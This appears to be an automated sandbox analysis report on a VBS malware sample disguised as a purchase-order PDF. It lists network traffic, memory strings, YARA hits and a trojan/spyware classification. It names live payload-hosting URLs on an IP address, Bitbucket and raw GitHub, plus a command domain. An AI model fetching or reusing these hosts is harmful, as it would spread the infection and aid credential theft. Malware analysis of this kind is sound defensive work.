1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 07:17:37 GMTContent-Type: text/html; charset=utf-8Content-Length: 2966Connection: closeVary: Accept-EncodingETag: "66cce1df-b96"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 35 66 35 66 35 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 38 25 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 2c 20 22 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 22 2c 20 22 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 22 2c 0a 09 09 09 09 09 22 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 22 3b 0a 09 09 09 09 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70 78 20 31 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 37 35 29 3b 0a 09 09 09 09 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 68 31 20 7b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 
32 2e 34 35 65 6d 3b 0a 09 09 09 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 35 64 35 64 35 64 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 30 2e 30 32 65 6d 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 61 6e 69 6d 61 74 65 64 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 75 72 61 74 69 6f 6e 3a 20 31 73 3b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 66 69 6c 6c 2d 6d 6f 64 65 3a 20 62 6f 74 68 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 61 6e 69 6d 61 74 65 5f 5f 66 61 64 65 49 6e 20 7b 0a 09 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 6
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://103.20.102.62
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243710855.00000127CD274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD365000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243758814.00000127CD280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://103.20.102.62/new_img.jpg
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D5B35000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://go.micros
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40898000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: WKOyCvoOlM.exe, 0000000A.00000002.3406481962.0000000004EB7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.030002350.xyz
        Source: WKOyCvoOlM.exe, 0000000A.00000002.3406481962.0000000004EB7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.030002350.xyz/wrcq/
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40850000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2612166769.0000020F4086A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3DB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4DA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5110000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45BC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D50EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5110000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 00000002.00000002.2612166769.0000020F40D87000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEC71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D4467000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2E0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243710855.00000127CD274000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD2F4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243914566.00000127CD365000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2243758814.00000127CD280000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bitbucket.org/jfgkfghf/sgsdghsdfs/downloads/new_img.jpg?13415
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: where.exe, 00000008.00000002.3405546672.000000000599C000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3405063400.00000000033FC000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D548A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D5B35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127D45CE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf;fbQ
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
        Source: where.exe, 00000008.00000002.3403339543.00000000028D7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
        Source: where.exe, 00000008.00000003.2669991240.0000000007BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
        Source: powershell.exe, 00000004.00000002.2476694945.00000127DECDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000004.00000002.2244616127.00000127D3BDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2244616127.00000127CEE93000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/richie213/ani/refs/heads/main/jdikobc.txt
        Source: where.exe, 00000008.00000002.3407103847.0000000007C1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: where.exe, 00000008.00000002.3407014638.0000000007970000.00000004.00000800.00020000.00000000.sdmp, where.exe, 00000008.00000002.3405546672.0000000005354000.00000004.10000000.00040000.00000000.sdmp, WKOyCvoOlM.exe, 0000000A.00000002.3405063400.0000000002DB4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2782973347.000000000B7A4000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: unknown Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.5:49705 version: TLS 1.2

        System Summary

        Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 3292, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
        Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" with an encoded payload assigned to $codigo
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A1D5B08_2_04A1D5B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A405918_2_04A40591
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049805358_2_04980535
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A375718_2_04A37571
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A316CC8_2_04A316CC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499C6E08_2_0499C6E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3F7B08_2_04A3F7B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0497C7C08_2_0497C7C0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049A47508_2_049A4750
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049807708_2_04980770
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3F0E08_2_04A3F0E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A370E98_2_04A370E9
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049870C08_2_049870C0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A2F0CC8_2_04A2F0CC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A401AA8_2_04A401AA
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498B1B08_2_0498B1B0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A381CC8_2_04A381CC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049701008_2_04970100
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A1A1188_2_04A1A118
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A4B16B8_2_04A4B16B
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0496F1728_2_0496F172
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049B516C8_2_049B516C
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049852A08_2_049852A0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A212ED8_2_04A212ED
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499B2C08_2_0499B2C0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A202748_2_04A20274
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049C739A8_2_049C739A
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A403E68_2_04A403E6
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498E3F08_2_0498E3F0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3132D8_2_04A3132D
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0496D34C8_2_0496D34C
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3A3528_2_04A3A352
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A20CB58_2_04A20CB5
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FCF28_2_04A3FCF2
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04970CF28_2_04970CF2
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04980C008_2_04980C00
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049F9C328_2_049F9C32
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04998DBF8_2_04998DBF
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499FDC08_2_0499FDC0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0497ADE08_2_0497ADE0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498AD008_2_0498AD00
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A37D738_2_04A37D73
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04983D408_2_04983D40
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A31D5A8_2_04A31D5A
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04992E908_2_04992E90
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04989EB08_2_04989EB0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3CE938_2_04A3CE93
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3EEDB8_2_04A3EEDB
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3EE268_2_04A3EE26
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04980E598_2_04980E59
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04981F928_2_04981F92
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FFB18_2_04A3FFB1
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04972FC88_2_04972FC8
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498CFE08_2_0498CFE0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FF098_2_04A3FF09
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049A0F308_2_049A0F30
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049C2F288_2_049C2F28
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049F4F408_2_049F4F40
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049668B88_2_049668B8
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049AE8F08_2_049AE8F0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049838E08_2_049838E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049ED8008_2_049ED800
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049828408_2_04982840
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0498A8408_2_0498A840
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A4A9A68_2_04A4A9A6
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049829A08_2_049829A0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049899508_2_04989950
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499B9508_2_0499B950
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049969628_2_04996962
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A1DAAC8_2_04A1DAAC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0497EA808_2_0497EA80
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049C5AA08_2_049C5AA0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A2DAC68_2_04A2DAC6
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A37A468_2_04A37A46
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FA498_2_04A3FA49
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049F3A6C8_2_049F3A6C
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0499FB808_2_0499FB80
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_049BDBF98_2_049BDBF9
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A36BD78_2_04A36BD7
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3FB768_2_04A3FB76
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_04A3AB408_2_04A3AB40
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007920E08_2_007920E0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0078D0008_2_0078D000
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0078D2208_2_0078D220
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0078B2A08_2_0078B2A0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007957808_2_00795780
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007939808_2_00793980
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_007ABED08_2_007ABED0
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E4538_2_0479E453
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A54248_2_047A5424
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A54AF8_2_047A54AF
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A549B8_2_047A549B
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_047A548B8_2_047A548B
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E7EC8_2_0479E7EC
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E3388_2_0479E338
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479D8B88_2_0479D8B8
        Source: C:\Windows\SysWOW64\where.exeCode function: 8_2_0479E9718_2_0479E971
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7C7CE10_2_04E7C7CE
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E92F1E10_2_04E92F1E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7404E10_2_04E7404E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7A9CE10_2_04E7A9CE
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7912E10_2_04E7912E
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E722EE10_2_04E722EE
        Source: C:\Program Files (x86)\bUEsIrxBaWDdMskCSjpiUxeFwcAtuIPMltVJosLQWp\WKOyCvoOlM.exeCode function: 10_2_04E7426E10_2_04E7426E
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 03235130 appears 36 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0326EA12 appears 84 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 03247E54 appears 88 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 031EB970 appears 266 times
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0327F290 appears 105 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049C7E54 appears 89 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049FF290 appears 105 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049B5130 appears 36 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 0496B970 appears 266 times
        Source: C:\Windows\SysWOW64\where.exeCode function: String function: 049EEA12 appears 84 times
        Source: PO-DC13112024_pdf.vbs Initial sample: Strings found which are bigger than 50
        Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 4396
        Source: Process Memory Space: powershell.exe PID: 1276, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 3292, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine Classification label: mal100.spre.troj.spyw.expl.evad.winVBS@12/8@11/7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
